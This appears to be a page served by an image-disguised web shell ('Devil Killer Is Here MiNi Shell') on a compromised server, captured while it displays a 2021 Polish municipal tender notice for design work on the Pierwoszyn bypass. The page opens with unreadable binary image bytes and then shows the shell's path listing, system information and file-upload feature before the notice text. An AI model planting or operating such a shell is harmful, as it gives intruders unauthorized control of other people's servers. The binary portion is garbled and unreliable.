JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210630/0010005501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00100055 z dnia 2021-06-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo – kosztorysowej dla realizacji zadania „Budowa<br/>obwodnicy Pierwoszyna - 2 edycja </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">URZĄD GMINY KOSAKOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000531708</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Żeromskiego 69</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kosakowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-198</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">www.zamowienia@kosakowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminakosakowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo – kosztorysowej dla realizacji zadania „Budowa<br/>obwodnicy Pierwoszyna - 2 edycja </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5132d9c8-d99a-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00100055</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001095/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Opracowanie dokumentacji projektowej budowy obwodnicy Pierwoszyna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formatyplików wykorzystywanych przez wykonawców powinny być zgodne z<br/>“OBWIESZCZENIEMPREZESARADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia<br/>jednolitego teksturozporządzeniaRady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagańdla rejestrówpublicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dlasystemówteleinformatycznych”.1. Zamawiający rekomenduje wykorzystanie<br/>formatów: .pdf .doc.xls.jpg (.jpeg) zeszczególnym wskazaniem na .pdf2. W celu ewentualnej kompresji<br/>danychZamawiający rekomendujewykorzystanie jednego z formatów:1. .zip 2. .7Z3. Wśród<br/>formatówpowszechnych a NIE występującychw rozporządzeniu występują: .rar .gif<br/>.bmp.numbers.pages.Dokumenty złożone w takich plikachzostaną uznane za złożone<br/>nieskutecznie.4.Zamawiający zwraca uwagę na ograniczenia wielkościplików podpisywanych profilem<br/>zaufanym, który wynosimax10MB,oraz na ograniczenie wielkościplików podpisywanych w aplikacji<br/>eDoApp służącej doskładania podpisu osobistego, który wynosi max5MB.5. Ze względu na niskie<br/>ryzyko naruszeniaintegralności pliku oraz łatwiejszą weryfikację podpisu,zamawiający zaleca, w miarę<br/>możliwości,przekonwertowanie plików składających się na ofertę naformat .pdf i opatrzenie ich<br/>podpisemkwalifikowanym PAdES. 6.Pliki w innych formatach niż PDFzaleca się opatrzyć<br/>zewnętrznympodpisem XAdES. Wykonawca powinien pamiętać, aby plik zpodpisem przekazywać<br/>łącznie zdokumentem podpisywanym.7.Zamawiającyzaleca aby w przypadkupodpisywania pliku przez<br/>kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymirodzajami podpisów<br/>np.osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacjiplików. 8. Zamawiający<br/>zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestowałmożliwość prawidłowego<br/>wykorzystania wybranej metody podpisania plików oferty.9. Zaleca się, abykomunikacja z<br/>wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślijwiadomość do<br/>zamawiającego”, nie za pośrednictwem adresu email.10. Osobą składającą ofertępowinna być osoba<br/>kontaktowa podawana w dokumentacji. 11.Ofertę należy przygotować z należytąstarannością dla<br/>podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniemodpowiedniego<br/>odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenieoferty na 24<br/>godziny przed terminem składania ofert/wniosków.12. Podczas podpisywania plikówzaleca się stosowanie algorytmuskrótuSHA2 zamiast SHA1. 13. Jeśli wykonawca pakuje dokumentynp. w plik ZIP<br/>zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U.UE L119 z dnia<br/>4maja2016r.,str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani/Pana<br/>danychosobowych jest GMINA KOSAKOWO, 81-198 KOSAKOWO, UL. ŻEROMSKIEGO<br/>69;2)administratorwyznaczył Inspektora Danych Osobowych Panią Ewelinę Paszke, z którą można się<br/>kontaktowaćpodadresem email: SEKRETARZ@KOSAKOWO.PL, TEL: 58 660-43-153) Pani/Pana<br/>daneosoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>zprzedmiotowympostępowaniem o udzielenie zamówienia publicznego, prowadzonym<br/>wtrybieprzetargunieograniczonego.4) odbiorcamiPani/Pana danych osobowych będą osoby<br/>lubpodmioty,którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74<br/>ustawyP.Z.P.5)Pani/Pana dane osobowe będą przechowywane ,zgodnie z art. 78 ust. 1 P.Z.P. przez<br/>okres 4lat oddnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowyprzekracza4lata,okres przechowywania obejmuje cały czas trwania umowy;6) obowiązek<br/>podaniaprzezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiemustawowymokreślonym w przepisanych ustawy P.Z.P., związanym z udziałem w<br/>postępowaniuoudzieleniezamówieniapublicznego.7) w odniesieniu do Pani/Pana danych osobowych<br/>decyzje niebędą podejmowane w sposób zautomatyzowany, stosownie do art. 22RODO.8) posiada<br/>Pani/Pana) napodstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłkumoże zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celusprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych(skorzystanie z prawa do prostowania nie może skutkować<br/>zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);c) na podstawie art. 18RODO prawo żądania od<br/>administratoraograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania<br/>postępowania oudzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w<br/>art. 18 ust. 2 RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>innej osoby fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej<br/>lub państwaczłonkowskiego); d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;9) nie przysługuje Pani/Panu :a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięciadanych osobowych ;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1<br/>lit.cRODO;10)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na<br/>niezgodnezRODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem<br/>właściwym dlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.21.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo kosztorysowej<br/>dróg w ciągu przyszłej „Obwodnicy Pierwoszyna” w oparciu o koncepcję „Koncepcja Obwodnicy<br/>Pierwoszyna” opracowaną przez POLDUKT PROJEKT Sp. z o.o. (Załącznik nr 1 do OPZ). W<br/>projektowaniu należy szczególnie wziąć pod uwagę stanowiska Zarządu Dróg Wojewódzkich w<br/>Gdańsku oraz Zarządu Dróg Powiatowych dla Powiatu Puckiego i Wejherowskiego. Po<br/>uwzględnieniu wszystkich uwag Zamawiającego i zatwierdzeniu projektu koncepcyjnego -<br/>opracowanie kompletnej wielobranżowej dokumentacji projektowo-kosztorysowej (projektu<br/>zagospodarowania terenu, architektoniczno-budowlanego, technicznego i wykonawczego,<br/>specyfikacji technicznych wykonania i odbioru robót oraz przedmiaru i kosztorysu<br/>inwestorskiego), wraz z uzyskaniem wszelkich opinii, uzgodnień, pozwoleń i innych dokumentów<br/>wymaganymi przepisami szczegółowymi, we wszystkich niezbędnych branżach.<br/>2. Całość zamierzenia inwestycyjnego ma stworzyć całkowicie nowy układ komunikacyjny<br/>począwszy od skrzyżowania z ul. H. Derdowskiego i ul. Żeromskiego w Kosakowie, poprzez<br/>skrzyżowania z ul. Chrzanowskiego w Kosakowie, skrzyżowanie z ul. Kaszubską w<br/>Pierwoszynie, skrzyżowaniem z ul. Rumską i Gdyńską w Mostach. Dodatkowo na całym odcinku<br/>należy zaprojektować połączenie z ul. Narcyzową, ul. Fiołkową, Ul. Niezapominajki w Kosakowie<br/>oraz pozostałymi drogami w Pierwoszynie i w Mostach. W ramach zadania należy<br/>zaprojektować parking po obu stronach ul. Fiołkowej oraz przewidzieć zjazdy na parkingi przy<br/>planowanych stacjach w Kosakowie i w Mostach. Cały układ drogowy w miejscowości Kosakowo<br/>ma tworzyć jednolity wspólny węzeł integracyjny dla komunikacji pieszej, rowerowej,<br/>samochodowej, autobusowej i kolejowej. W ramach projektu należy zaprojektować ścieżki<br/>rowerowe oraz chodniki. Na całym odcinku zaprojektować kanalizację deszczową wraz z<br/>odbiornikami. Na całym odcinku zaprojektować oświetlenie uliczne. W ramach projektu należy<br/>zaprojektować nową Stałą Organizację Ruchu.<br/>3. Przed przystąpieniem do projektowania należy zrobić pełną Analizę Komunikacyjna w oparciu<br/>o pomiary natężenia ruchu oraz prognozowany wzrost natężenia ruchu w kolejnych 10-ciu<br/>latach. W oparciu o tak sporządzoną analizę komunikacyjną należy zaproponować rozwiązania<br/>skrzyżowań we wszystkich miejscach. Pomiary natężenia ruchu należy wykonać we wszystkich<br/>miejscach zaznaczonych na mapie która stanowi załącznik nr 2 do OPZ. Pomiary ruchu należy<br/>przeprowadzić w dwóch terminach:<br/>a) W okresie od lipca 2021 do sierpnia 2021 (pomiar ruchu z uwzględnieniem<br/>ruchu turystycznego)<br/>b) W dowolnym dniu tygodnia (od poniedziałku do piątku) w miesiącu wrzesień lub październik<br/>2021 r.<br/>4. Całokształt opracowań będzie dalej zwany Dokumentacją. Dokumentację należy opracować<br/>w oparciu o wytyczne i zalecenia sformułowane przez Zamawiającego w niniejszym opracowaniu. Poniższe wytyczne stosuje się wprost o ile zawarta umowa nie stanowi inaczej.<br/>Odstępstwo od wytycznych może nastąpić, jeżeli obowiązujące przepisy stanowią inaczej lub<br/>proponowane przez Projektanta (Wykonawcę) rozwiązanie uzyska zatwierdzenie przez<br/>Zamawiającego. O powstaniu takiej sytuacji Wykonawca zobowiązany jest niezwłocznie<br/>powiadomić Zamawiającego.<br/>5. W zakresie zamówienia Wykonawca zobowiązany będzie również do :<br/>a) opracowania wniosków o wydanie decyzji o pozwoleniu na budowę/ zezwolenia na realizację<br/>inwestycji drogowej i wprowadzenia wszelkich zmian lub uzupełnień do w/w wniosków, które<br/>okażą się konieczne w związku z przebiegiem postępowania administracyjnego.<br/>b) udzielanie odpowiedzi i wyjaśnień w toku postępowania o udzielenie zamówienia na roboty<br/>budowlane prowadzonego przez Zamawiającego w zakresie opracowanej przez siebie<br/>Dokumentacji.<br/>c) na wezwanie Zamawiającego, dwukrotnego przeszacowania całego Kosztorysu<br/>Inwestorskiego w terminie 14-tu dni od otrzymania wezwania pisemne lub środkami komunikacji<br/>elektronicznej, bez żądania przez Wykonawcę dodatkowego wynagrodzenia z powyższych<br/>powodów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji<br/>a) Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania<br/>Zamawiającego i na skutek jego dyspozycji w tym zakresie, przy czym zarówno zakres<br/>zamówienia objęty prawem opcji, jak i okoliczności, w jakich dojść może do skorzystania z tego<br/>prawa są określone w niniejszym Opisie Przedmiotu Zamówienia i zawartej z Wykonawcą<br/>umowie o prace projektowe.<br/>b) Zamawiającemu przysługuje prawo uruchomienia opcji w terminie 36 miesięcy od<br/>protokolarnego odbioru końcowego Dokumentacji, o której mowa w pkt.1.1 niniejszego Opisu<br/>Przedmiotu Zamówienia.<br/>c) O uruchomieniu opcji Zamawiający powiadomi Wykonawcę w formie pisemnej.<br/>d) Wykonawca zobowiązany jest do dostarczenia do siedziby Zamawiającego oświadczenia o<br/>podjęciu obowiązków nadzoru autorskiego i rozpoczęcia sprawowania nadzoru autorskiego -<br/>zgodnie z art. 20 i 21 Ustawy Prawo budowlane - na pisemne wezwanie Zamawiającego, o<br/>którym mowa powyżej, nie później niż w terminie 7 dni od otrzymania tego wezwania<br/>1) Opcja obejmuje pełnienie przez Wykonawcę wielobranżowego Nadzoru autorskiego nad<br/>budową realizowaną według opracowanej przez Wykonawcę Dokumentacji, zgodnie z art.20<br/>ust.1 pkt 4) Ustawy Prawo Budowlane. Pozostałe informacje w SWZ <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">742 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co<br/>najmniej jedną dokumentację , której przedmiotem była budowa/przebudowa ulicy będącej<br/>drogą klasy zbiorczej (Z) lub wyższej, gdzie wartość prac projektowych wynosiła nie mniej niż<br/>100.000 złotych brutto dla każdej z tych dokumentacji a Inwestor uzyskał prawomocną decyzję<br/>pozwolenia na budowę lub decyzję ZRiD lub, jeżeli nie było takiej konieczności, skutecznie<br/>zgłoszono roboty (bez sprzeciwu organu administracji budowlanej) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">wykaz usług porównywalnych z usługami stanowiącymi przedmiot<br/>zamówienia, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub<br/>usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi były<br/>wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych<br/>nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wydane w okresie ostatnich 3 miesięcy - załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) 